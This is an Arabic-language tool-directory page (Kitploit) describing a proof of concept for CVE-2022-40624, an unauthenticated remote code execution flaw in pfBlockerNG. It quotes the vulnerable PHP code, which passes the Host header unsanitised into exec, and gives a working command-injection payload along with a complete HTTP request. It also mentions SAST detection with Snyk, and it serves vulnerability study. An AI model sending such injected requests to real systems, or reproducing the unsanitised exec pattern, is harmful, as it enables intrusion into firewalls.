Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
pfBlockerNg-CVE-2022-40624 — إثبات مفهوم لاستغلال تنفيذ التعليمات البرمجية عن بُعد دون مصادقة في pfBlockerNg عبر إدخال غير مُنقّى في دالة استعلام DNSBL TLD، مع تحليل اكتشاف SAST. | Kitploit
أدوات/GitHubGitHub/dhammon/pfblockerng-cve-2022-40624
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubdhammon/pfblockerng-cve-2022-40624

pfBlockerNg-CVE-2022-40624

إثبات مفهوم لاستغلال تنفيذ التعليمات البرمجية عن بُعد دون مصادقة في pfBlockerNg عبر إدخال غير مُنقّى في دالة استعلام DNSBL TLD، مع تحليل اكتشاف SAST.

عرض المستودع
22منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

pfBlockerNg-CVE-2022-40624

خلفية

pfBlockerNG هو الجيل التالي من pfBlocker ويتميز بالخصائص التالية:

  1. إدارة مصادر قوائم IPv4/v6 إلى صيغ 'Deny أو Permit أو Match'.
  2. قاعدة بيانات GeoIP من MaxMind Inc. (الإصدار المجاني GeoLite2).
  3. تحسينات إزالة التكرار، والحجب، والسمعة.
  4. إمكانية التنزيل من صيغ قوائم متنوعة.
  5. تكامل متقدم لموارد تهديدات السمعة عبر IP من Proofpoint ET IQRisk.
  6. حظر أسماء النطاقات (DNSBL) عبر محلل Unbound DNS.

https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html

الإصدارات المتأثرة

pfBlockerNg <2.1.4_27

الثغرة

تنفيذ أكواد عشوائي عن بُعد بدون مصادقة (RCE)

يتضمن استعلام قسم حظر TLD في index.php إدخال مستخدم غير منقّى/غير مهرَّب d_query من مصدر رأس المضيف (Host) إلى مغرق دالة PHP exec.

exec("/usr/bin/grep -l '^{$d_query}$' /var/db/pfblockerng/dnsblalias/DNSBL_TLD", $match);

/pfblockerng/www/index.php
root@kitploit:~
// Query for a TLD Block
if (empty($pfb_query)) {
	$idparts	= explode('.', $query);
	$idcnt		= (count($idparts) -1);

	for ($i=1; $i <= $idcnt; $i++) {
		$d_query = implode('.', array_slice($idparts, -$i, $i, TRUE));
		exec("/usr/bin/grep -l '^{$d_query}$' /var/db/pfblockerng/dnsblalias/DNSBL_TLD", $match);

		if (!empty($match[0])) {
			$pfb_query = 'DNSBL_TLD';
			break;
		}
	}
}

الاستغلال

يتطلب الوصول عبر HTTP إلى وحدة تحكم pfSense على الويب حمولة نموذجية: ' *; sleep 5; '

طلب إثبات المفهوم:

root@kitploit:~
GET /pfblockerng/www/index.php HTTP/1.1
Host: test.test2' *; sleep 5; '
Content-Length: 2

الإلهام

أنا أحب pfBlockerNg وقد استوحيت ذلك من ثغرة CVE-2022-31814 الأخيرة التي اكتشفها Di r00t ومن الشرح الرائع https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/ وكنت فضولياً لمعرفة ما إذا كانت أداة اختبار أمان التطبيقات الثابتة (SAST) من Snyk ستكتشف الثغرة. لذا قمت بتنزيل ملف الإصدار 2.1.4_26 المعني من index.php وشغّلت Snyk Code عليه. وبالفعل اكتشفت Snyk الثغرة بالإضافة إلى ثغرة أخرى مماثلة بعد بضعة أسطر فقط.

تنزيل الأداة